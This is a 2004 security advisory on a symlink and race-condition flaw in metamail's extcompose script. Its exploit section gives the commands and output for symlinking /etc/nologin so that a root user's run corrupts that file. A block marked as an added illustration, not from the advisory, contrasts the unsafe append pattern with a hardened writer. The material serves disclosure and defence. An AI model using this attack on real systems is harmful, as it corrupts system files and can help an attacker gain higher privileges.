
extcompose.txt
Posted Mar 13, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Extcompose, a function of the metamail package, fails to properly verify a file exists prior to writing to it, and will accept symbolic links, leaving it open to being an attack vector.

tags | advisory
SHA-256 | ecb0d56a71d017b5a7e9ee58f1fd7f55abb82c34705174f94c74945fd4205bde

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Extcompose included with the common
metamail package.
http://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions: All
Bug: Symlink bug / race condition
Impact: Attackers can write to arbitrary files,
and in theory, elevate privileges
Date: March 11, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a
properly-equipped work-station to enter the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included in the mail message itself
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user data and writes the relevant output to the
file specified by the user on the command line. The
extcompose script, unfortunately, does not check for
the existence of the specified output file, nor does it
check for the possibility of the specified filename
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.
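The following is an added illustration, not code from the advisory or from the metamail package: the "echo [data] >> file" pattern described above, beside a hardened writer that creates the output file exclusively and writes through a single descriptor, so a symlink planted at the output path is refused rather than followed. The file paths and MIME lines are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the advisory or metamail). Demonstrates why a
# series of ">>" appends follows a planted symlink, and one way to refuse it.

# Vulnerable pattern: each ">>" re-resolves the path, so a symlink sitting
# at $1 sends every line into the symlink's target instead.
unsafe_write() {
    out=$1
    echo "Content-type: message/external-body;" >> "$out"
    echo "Content-transfer-encoding: base64" >> "$out"
}

# Hardened pattern, run in a subshell so "set -C" and fd 3 stay local.
# "set -C" (noclobber) makes ">" create the file with O_EXCL, which fails
# when anything, a symlink included, already occupies the path. Later lines
# go through fd 3, bound to the inode we created, so the path is never
# resolved again and cannot be swapped underneath us.
safe_write() (
    out=$1
    set -C
    { exec 3>"$out"; } 2>/dev/null || exit 1
    echo "Content-type: message/external-body;" >&3
    echo "Content-transfer-encoding: base64" >&3
    exec 3>&-
)

# Demo: a symlink is planted where the output file is expected (constructed
# stand-in for the /etc/nologin scenario). Returns 0 when the unsafe writer
# corrupts the victim file and the hardened writer refuses to write at all.
demo() {
    dir=$(mktemp -d) || return 1
    : > "$dir/victim"
    ln -s "$dir/victim" "$dir/mailfile"

    unsafe_write "$dir/mailfile"
    unsafe_lines=$(wc -l < "$dir/victim" | tr -d ' ')   # 2: written through

    : > "$dir/victim"                                   # fresh victim, link stays
    if safe_write "$dir/mailfile"; then safe_rc=0; else safe_rc=$?; fi
    safe_lines=$(wc -l < "$dir/victim" | tr -d ' ')     # 0: open refused

    rm -rf "$dir"
    [ "$unsafe_lines" -eq 2 ] && [ "$safe_rc" -ne 0 ] && [ "$safe_lines" -eq 0 ]
}

demo && echo "hardened writer refused the symlinked output path"
```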

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose is run by root and an
attacker has created a symlink to /etc/nologin, or worse,
the results could be quite severe. An example attack
is demonstrated below.

Because an attacker must know the filename specified
by the invoking user of extcompose in order to create
the symlink, this could be considered a race condition
(i.e. the attacker might see the unsuspecting user
typing the command in an office environment, and
quickly create the symlink using her terminal).


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
1 -- In a local file
2 -- In an AFS file
3 -- In an anonymous FTP directory on the Internet
4 -- In an Internet FTP directory that requires a
valid login
5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
1 -- No, it is not encoded
2 -- Yes, it is encoded in base64
3 -- Yes, it is encoded in quoted-printable
4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type: text/plain
Content-transfer-encoding: base64
###


As demonstrated, extcompose does not handle its output
file safely, thus presenting the possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'. In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists. I have attempted to contact the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.




